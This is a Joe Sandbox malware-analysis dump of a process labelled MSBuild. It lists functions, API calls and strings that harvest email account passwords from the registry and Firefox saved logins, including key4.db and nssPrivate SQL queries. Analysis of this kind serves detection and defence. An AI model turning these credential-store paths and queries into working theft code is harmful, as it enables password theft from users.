Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
API String ID: 4171719235-3943159138
Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58

Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0041042E
GetDlgItem.USER32(?,000003E8), ref: 0041043A
GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
GetWindowLongA.USER32(?,000000F0), ref: 00410455
GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
GetWindowLongA.USER32(?,000000EC), ref: 0041046A
GetWindowRect.USER32(00000000,?), ref: 0041047C
GetWindowRect.USER32(?,?), ref: 00410487
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
GetDC.USER32 ref: 004104E2
strlen.MSVCRT ref: 00410522
GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
ReleaseDC.USER32(?,?), ref: 00410580
sprintf.MSVCRT ref: 00410640
SetWindowTextA.USER32(?,?), ref: 00410654
SetWindowTextA.USER32(?,00000000), ref: 00410672
GetDlgItem.USER32(?,00000001), ref: 004106A8
GetWindowRect.USER32(00000000,?), ref: 004106B8
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
GetClientRect.USER32(?,?), ref: 004106DD
GetWindowRect.USER32(?,?), ref: 004106E7
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
GetClientRect.USER32(?,?), ref: 00410737
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F

Strings

EDIT, xrefs: 0041061B
%s:, xrefs: 0041063A
STATIC, xrefs: 004105E4

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
String ID: %s:$EDIT$STATIC
API String ID: 1703216249-3046471546
Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16

Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004024F5

Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8

_mbscpy.MSVCRT(?,00000000,?,?,?,75A8EB20,?,00000000), ref: 00402533
_mbscpy.MSVCRT(?,?), ref: 004025FD

Strings

POP3, xrefs: 00402490
IMAP User Name, xrefs: 0040245F
POP3 Secure Connection, xrefs: 004024C8
Password2, xrefs: 004025D3
IMAP Server, xrefs: 0040247B
IMAP, xrefs: 00402497
HTTPMail Server, xrefs: 00402482
HTTPMail, xrefs: 0040249E
SMTP Display Name, xrefs: 00402568
SMTP Email Address, xrefs: 0040257D
HTTPMail Secure Connection, xrefs: 004024D6
HTTPMail Port, xrefs: 004024BA
SMTP Secure Connection, xrefs: 004024DD
POP3 Port, xrefs: 004024AC
SMTP, xrefs: 004024A5
IMAP Secure Connection, xrefs: 004024CF
IMAP Port, xrefs: 004024B3
SMTP Server, xrefs: 00402489, 0040259A
SMTP USer Name, xrefs: 0040246D
POP3 User Name, xrefs: 00402458
POP3 Server, xrefs: 00402474
HTTPMail User Name, xrefs: 00402466
SMTP Port, xrefs: 004024C1

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscpy$QueryValuememset
String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
API String ID: 168965057-606283353
Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98

Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00402869

Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3

_mbscpy.MSVCRT(?,?,75A8EB20,?,00000000), ref: 004028A3

Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01

_mbscpy.MSVCRT(?,?,?,?,?,?,?,?,75A8EB20,?,00000000), ref: 0040297B

Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5

Strings

POP3, xrefs: 004027CC
HTTPMail Use SSL, xrefs: 0040284A
HTTP Server URL, xrefs: 004027F6
IMAP Server, xrefs: 004027EF
SMTP Use SSL, xrefs: 00402851
IMAP, xrefs: 004027D3
IMAP Use SPA, xrefs: 00402843
Email, xrefs: 004028E7
Password, xrefs: 00402952
SMTP User, xrefs: 00402819
HTTP Port, xrefs: 0040282E
Display Name, xrefs: 004028D4
HTTP, xrefs: 004027DA
POP3 Use SPA, xrefs: 0040283C
IMAP User, xrefs: 0040280B
HTTP User, xrefs: 00402812
POP3 Port, xrefs: 00402820
SMTP, xrefs: 004027E1
IMAP Port, xrefs: 00402827
SMTP Server, xrefs: 004027FD, 004028FF
POP3 User, xrefs: 00402804
POP3 Server, xrefs: 004027E8
SMTP Port, xrefs: 00402835, 00402916

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: QueryValue_mbscpy$ByteCharMultiWidememset
String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
API String ID: 1497257669-167382505
Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98

Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 0040FC88
GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
memset.MSVCRT ref: 0040FCFD
memset.MSVCRT ref: 0040FD1D
memset.MSVCRT ref: 0040FD3B
memset.MSVCRT ref: 0040FD54
memset.MSVCRT ref: 0040FD72
memset.MSVCRT ref: 0040FD8B
GetCurrentProcess.KERNEL32 ref: 0040FD93
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
memset.MSVCRT ref: 0040FE45
GetCurrentProcessId.KERNEL32 ref: 0040FE53
memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
_mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
sprintf.MSVCRT ref: 0040FF0F
SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
GetDlgItem.USER32(?,000003EA), ref: 0040FF32
SetFocus.USER32(00000000), ref: 0040FF39

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
{Unknown}, xrefs: 0040FD02

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
API String ID: 1428123949-3474136107
Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A

Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003EC), ref: 004010BC
ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
GetDlgItem.USER32(?,000003EE), ref: 00401103
ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
GetDlgItem.USER32(?,000003EC), ref: 0040113E
ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
LoadCursorA.USER32(00000067), ref: 0040115F
SetCursor.USER32(00000000,?,?), ref: 00401166
GetDlgItem.USER32(?,000003EE), ref: 00401186
ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
GetDlgItem.USER32(?,000003EC), ref: 004011AD
SetBkMode.GDI32(?,00000001), ref: 004011B9
SetTextColor.GDI32(?,00C00000), ref: 004011C7
GetSysColorBrush.USER32(0000000F), ref: 004011CF
GetDlgItem.USER32(?,000003EE), ref: 004011EF
EndDialog.USER32(?,00000001), ref: 0040121A
DeleteObject.GDI32(?), ref: 00401226
GetDlgItem.USER32(?,000003ED), ref: 0040124A
ShowWindow.USER32(00000000), ref: 00401253
GetDlgItem.USER32(?,000003EE), ref: 0040125F
ShowWindow.USER32(00000000), ref: 00401262
SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
memset.MSVCRT ref: 0040128E
SetWindowTextA.USER32(?,00000000), ref: 004012AA
SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
String ID:
API String ID: 2998058495-0
Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58

Function 0040BBF0 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 300windowregistrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B

SetMenu.USER32(?,00000000), ref: 0040BD23
SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
_strcmpi.MSVCRT ref: 0040BE93
RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
SetFocus.USER32(?,00000000), ref: 0040BECE
GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
strlen.MSVCRT ref: 0040BEFE
strlen.MSVCRT ref: 0040BF0C
RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68

Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8

SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
memset.MSVCRT ref: 0040BFDB
SetWindowTextA.USER32(?,?), ref: 0040BFFF

Strings

report.html, xrefs: 0040BF05, 0040BF1D
/noloadsettings, xrefs: 0040BE8D
SysListView32, xrefs: 0040BDC6
commdlg_FindReplace, xrefs: 0040BF63

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
API String ID: 2303586283-933021314
Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9

Function 0044257F Relevance: 33.4, APIs: 7, Strings: 15, Instructions: 375COMMON

Download Yara Rule

APIs

memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C

Strings

G+D, xrefs: 004428EE, 004428A0
vfs, xrefs: 004427FB
no such %s mode: %s, xrefs: 004428C4
,nE, xrefs: 00442875
file:, xrefs: 004425C2
no such vfs: %s, xrefs: 00442967
access, xrefs: 0044287C
%s mode not allowed: %s, xrefs: 00442909
BINARY, xrefs: 00442589
localhost, xrefs: 00442651
G+D, xrefs: 0044297A
mode, xrefs: 00442859
invalid uri authority: %.*s, xrefs: 00442667
@, xrefs: 004425D8
cache, xrefs: 00442827, 00442849

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcmp$memcpy
String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
API String ID: 231171946-2189169393
Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99

Function 0041108D Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004110AE
memset.MSVCRT ref: 004110C2
_mbscpy.MSVCRT(?,<font,?,?,?,?,?), ref: 004110EF
sprintf.MSVCRT ref: 0041110A
_mbscat.MSVCRT ref: 00411117
sprintf.MSVCRT ref: 00411141
_mbscat.MSVCRT ref: 0041114E
_mbscat.MSVCRT ref: 0041115C
_mbscat.MSVCRT ref: 0041116E
_mbscat.MSVCRT ref: 00411179
_mbscat.MSVCRT ref: 0041118B
_mbscat.MSVCRT ref: 0041119D

Strings

color="#%s", xrefs: 0041113B
</font>, xrefs: 00411197
<b>, xrefs: 00411168
size="%d", xrefs: 00411104
<font, xrefs: 004110E9
</b>, xrefs: 00411185

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: _mbscat$memsetsprintf$_mbscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 633282248-1996832678
Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D

Function 00406746 Relevance: 30.3, APIs: 16, Strings: 4, Instructions: 287COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406782

Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20

memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
memcpy.MSVCRT(?,?,00000010), ref: 004068BA
memcpy.MSVCRT(?,?,00000010), ref: 004068D3
memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
memcpy.MSVCRT(?,00000015,?), ref: 00406908
memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
memcpy.MSVCRT(?,00000023,?), ref: 00406A03
memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86

Strings

key4.db, xrefs: 00406756
, xrefs: 00406834
SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
SELECT a11,a102 FROM nssPrivate, xrefs: 00406933

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memcmp$memsetstrlen
String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
API String ID: 3614188050-3983245814
Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98

Function 0040A953 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 182COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040A973
memset.MSVCRT ref: 0040A996
memset.MSVCRT ref: 0040A9AC
memset.MSVCRT ref: 0040A9BC
sprintf.MSVCRT ref: 0040A9F0
_mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
sprintf.MSVCRT ref: 0040AABE
_mbscat.MSVCRT ref: 0040AAED

Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7

_mbscpy.MSVCRT(?,?), ref: 0040AAD2
sprintf.MSVCRT ref: 0040AB21

Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D

Strings

nowrap, xrefs: 0040AA31
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040A97B
</table><p>, xrefs: 0040AB43
bgcolor="%s", xrefs: 0040A9EA
<table border="1" cellpadding="5">, xrefs: 0040A9F8
<font color="%s">%s</font>, xrefs: 0040AAB6
 , xrefs: 0040AAE7

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 710961058-601624466
Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55

Function 004111AA Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 114COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004111CB
memset.MSVCRT ref: 004111DF
memset.MSVCRT ref: 004111F3
sprintf.MSVCRT ref: 0041121D
sprintf.MSVCRT ref: 00411247
_mbscpy.MSVCRT(?,</font>,?,<font color="%s">,00000000,000000FF,?,?,?,?,?,?,?,?,?,00000006), ref: 00411258
sprintf.MSVCRT ref: 00411273
memset.MSVCRT ref: 004112AE
sprintf.MSVCRT ref: 004112C9
sprintf.MSVCRT ref: 004112FD

Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7

Strings

<font color="%s">, xrefs: 00411241
width="%s", xrefs: 004112C3
bgcolor="%s", xrefs: 00411217
<table border="1" cellpadding="5"><tr%s>, xrefs: 0041126D
</font>, xrefs: 00411252
<th%s>%s%s%s, xrefs: 004112F7

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: sprintf$memset$_mbscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 3402215030-3842416460
Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65

Function 0040F0CE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E

Part of subcall function 004080D4: free.MSVCRT ref: 004080DB

Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042

Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38

Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F

strlen.MSVCRT ref: 0040F139
strlen.MSVCRT ref: 0040F147
memset.MSVCRT ref: 0040F187
strlen.MSVCRT ref: 0040F196
strlen.MSVCRT ref: 0040F1A4
memset.MSVCRT ref: 0040F1EA
strlen.MSVCRT ref: 0040F1F9
strlen.MSVCRT ref: 0040F207
_strcmpi.MSVCRT ref: 0040F2B2
_mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
_mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E

Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA

Strings

signons.txt, xrefs: 0040F140, 0040F15E
none, xrefs: 0040F2AC
logins.json, xrefs: 0040F200, 0040F21E
signons.sqlite, xrefs: 0040F19D, 0040F1BD

Memory Dump Source

Source File: 0000000D.00000002.1922743120.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_MSBuild.jbxd

Similarity

API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
String ID: logins.json$none$signons.sqlite$signons.txt
API String ID: 2003275452-3138536805
Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99

Function 0040C3D0 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 111stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040C3F7
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
